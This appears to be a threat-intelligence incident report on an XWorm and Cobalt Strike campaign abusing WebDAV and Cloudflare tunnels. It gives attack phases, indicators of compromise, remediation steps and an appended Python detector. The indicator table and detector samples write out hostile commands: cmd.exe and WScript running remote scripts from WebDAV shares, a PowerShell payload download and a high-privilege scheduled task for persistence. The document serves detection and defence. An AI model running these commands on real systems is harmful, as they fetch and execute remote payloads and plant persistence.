Incident #2: XWorm Campaign
Reported: February 17, 2025 03:36 UTC
Potential Threat Actor
FIN7 - CARBANAK | MuddyWater | APT29 (Cozy Bear) | APT41 (Winnti Group)
Attack Type
Malware Deployment
Initial Vector
Email - WebDAV Exploitation
Attack Overview
A highly evasive, multi-stage attack that leverages Cloudflare Tunnels, WebDAV abuse, and in-memory execution techniques, ultimately leading to XWorm and Cobalt Strike deployment. The adversary employed process injection, process hollowing, and forensic artifact removal, reinforcing the likelihood of an advanced threat actor. The attack culminated in system logs being wiped and an abrupt system reset, indicating deliberate anti-forensic measures.
- Phase 1 - Initial Infection: The attacker sends an email with a .library-ms attachment. When opened, Windows parses the file's embedded XML, which points to a malicious WebDAV URL.
- Phase 2 - Execution & Multiple Payload Retrieval: Once the first stager executes, a trycloudflare[.]com tunnel is abused to deliver additional Python files, DLLs, .lnk files, .vbs, JavaScript, and .bat files. Some of these files may serve as decoys.
- Phase 3 - Execution, Persistence & Defense Evasion: Multiple processes interact with the malicious files, opening new C2 channels.
- Phase 4 - System Manipulation & Log Clearance: The adversary used process hollowing, memory-based execution, and forensic artifact removal. The abrupt system reset and log clearance suggest a deliberate effort to cover tracks, consistent with an advanced threat actor at work.
Key Indicators of Compromise (IOCs)
| Indicator | Description |
|---|---|
| \\canada-divisions-young-feedback[.]trycloudflare[.]com@SSL\DavWWWRoot\YFSAUJKSFA | Malicious WebDAV share |
| hxxps://spokesman-disagree-comparing-feeling[.]trycloudflare[.]com/new.vbs | Malicious URL |
| mounts-og-annie-gm[.]trycloudflare[.]com@SSL\DavWWWRoot\55.js | Malicious WebDAV share |
| hxxps://placing-approaches-odd-eds[.]trycloudflare[.]com/bab.zip | Malicious URL |
| "cmd.exe" /c \\webster-zealand-nurse-sox[.]trycloudflare[.]com@SSL\DavWWWRoot\new.bat | Process execution |
| "cmd.exe" /c \\impressive-abs-respondent-accuracy[.]trycloudflare[.]com@SSL\DavWWWRoot\new.bat | Process execution |
| 1TSB790283HJSA.lnk | Malicious .lnk file |
| 3YS7302120481_SCAN_pdf.lnk | Malicious .lnk file |
| tasklist /FI "IMAGENAME eq AvastUI.exe" | Security tool enumeration |
| WScript.exe "\\mounts-og-annie-gm[.]trycloudflare[.]com@SSL\DavWWWRoot\55.js" | Process execution |
| rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie mounts-og-annie-gm[.]trycloudflare[.]com@SSL hxxps://mounts-og-annie-gm[.]trycloudflare[.]com/55.js | Process execution |
| powershell -Command "Invoke-WebRequest -Uri 'hxxps://placing-approaches-odd-eds[.]trycloudflare[.]com/bab.zip'" | PowerShell execution |
| "NOTEPAD.EXE" C:\Users\username\Python\Python312\NEWS.txt | Process injection |
| 06ef01c2b9b1d5e2b668a96d6a45619f9c05fac1211818e12c32e51950d44e6 | SHA256 hash |
| 41c3d475ca66d6ee25576e11dc620851f053075d31adc9fc191d4a382f4dd93 | SHA256 hash |
| 32a0ea3ec1b3e57db8e52955deb2f3dd88eea79f8b6676d04aa989cee80678f4 | SHA256 hash |
| 9a78e307c82cd08873611bab402a64a2d3a52cfa8c309e757241dfaa2588e2b3 | SHA256 hash |
| 684ab9d329164818ba5239608319862193355c5a3c5e62fc8b832928db021475 | SHA256 hash |
| "schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "goldk" /tr "C:\Users\ron\AppData\Roaming\goldk" | Persistence via scheduled task: runs the named binary every minute with highest privileges |
Remediation Steps
Immediate Actions
- Isolate the affected system – Remove from the network to prevent further spread.
- Pull a full forensic disk image – Preserve evidence before rebooting.
- Rotate all credentials, especially in Azure AD – Prevent unauthorized access.
- Block outbound traffic to Cloudflare tunnels (trycloudflare.com) – Stop C2 communication.
- Disable the WebClient service (the WebDAV mini-redirector, davclnt.dll) if not needed – Prevent abuse of WebDAV for execution.
- Monitor WebDAV usage (rundll32.exe davclnt.dll) – Alert on unexpected executions.
- Review Azure logs for unusual admin activity – Check for privilege escalation/lateral movement.
- Check persistence mechanisms – Inspect Scheduled Tasks, Registry, Startup Folders for backdoors.
Long-term Mitigations
- Enforce application control (AppLocker, WDAC) – Block unsigned scripts/executables.
- Enable PowerShell logging (Script Block, Module Logging) – Improve script visibility.
- Monitor Cloudflare subdomains for abuse – Detect unusual DNS requests.
- Restrict execution of WScript and Rundll32 via GPO/AppLocker – Prevent script-based execution.
- Enhance network monitoring – Log unusual WebDAV connections.
- Enforce least privilege access – Reduce exposure to credential theft & lateral movement.
- Conduct security awareness training – Educate users on phishing & social engineering tactics.
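As an added example (not part of the original report), the monitoring points above turned into a small Python detector: it applies rules derived from the report's IOCs (WebDAV UNC paths to trycloudflare.com, rundll32 DavSetCookie, script hosts launched from a UNC share, minute-interval high-privilege scheduled tasks, tasklist process enumeration) to constructed process-creation command lines. Rule names and the sample events are assumptions.

```python
import re

# Constructed sample CommandLine values (some mirror the report's IOCs, two are benign).
SAMPLE_EVENTS = [
    r'"cmd.exe" /c \\webster-zealand-nurse-sox.trycloudflare.com@SSL\DavWWWRoot\new.bat',
    r'rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie mounts-og-annie-gm.trycloudflare.com@SSL https://mounts-og-annie-gm.trycloudflare.com/55.js',
    r'WScript.exe "\\mounts-og-annie-gm.trycloudflare.com@SSL\DavWWWRoot\55.js"',
    r'"schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "goldk" /tr "C:\Users\ron\AppData\Roaming\goldk"',
    r'tasklist /FI "IMAGENAME eq AvastUI.exe"',
    r'"C:\Windows\explorer.exe" \\fileserver.corp.local\share\report.docx',   # benign UNC use
    r'"schtasks.exe" /create /sc daily /tn "Backup" /tr "C:\Tools\backup.exe"',  # benign task
]

# Detection rules (hypothetical names): each is (rule_name, compiled regex over the command line).
RULES = [
    # UNC path to a trycloudflare.com WebDAV share (the @SSL\DavWWWRoot form seen in the IOCs)
    ("webdav_unc_to_trycloudflare", re.compile(r'\\\\[\w.-]+\.trycloudflare\.com@SSL\\DavWWWRoot', re.I)),
    # Any trycloudflare.com host in a command line; noisy in some environments, tune as needed
    ("trycloudflare_host", re.compile(r'[\w-]+\.trycloudflare\.com', re.I)),
    # rundll32 loading the WebDAV client DLL to set a cookie for a remote share
    ("rundll32_davclnt_davsetcookie", re.compile(r'rundll32(\.exe)?\s+.*davclnt\.dll,\s*DavSetCookie', re.I)),
    # wscript/cscript started with a UNC path as its first argument
    ("script_host_from_unc", re.compile(r'^"?(wscript|cscript)(\.exe)?"?\s+"?\\\\', re.I)),
    # Scheduled task created with highest run level and a one-minute interval
    ("schtasks_minute_highest", re.compile(r'schtasks.*/create.*/RL\s+HIGHEST.*/sc\s+minute.*/mo\s+1\b', re.I)),
    # tasklist filtered by image name, used in the report to check for AvastUI.exe
    ("tasklist_process_enumeration", re.compile(r'tasklist\s+/FI\s+"IMAGENAME\s+eq\s+\S+"', re.I)),
]


def classify(command_line):
    """Return the names of all rules that match one command line (empty list means no hit)."""
    return [name for name, rx in RULES if rx.search(command_line)]


def scan(events):
    """Map each command line with at least one hit to its triggered rules; benign lines are omitted."""
    return {cl: hits for cl in events if (hits := classify(cl))}


if __name__ == "__main__":
    for cl, hits in scan(SAMPLE_EVENTS).items():
        print(f"{', '.join(hits):45s} <- {cl[:70]}")
```

Sysmon Event ID 1 or Windows Security Event ID 4688 (with command-line auditing enabled) both provide the CommandLine field these rules expect.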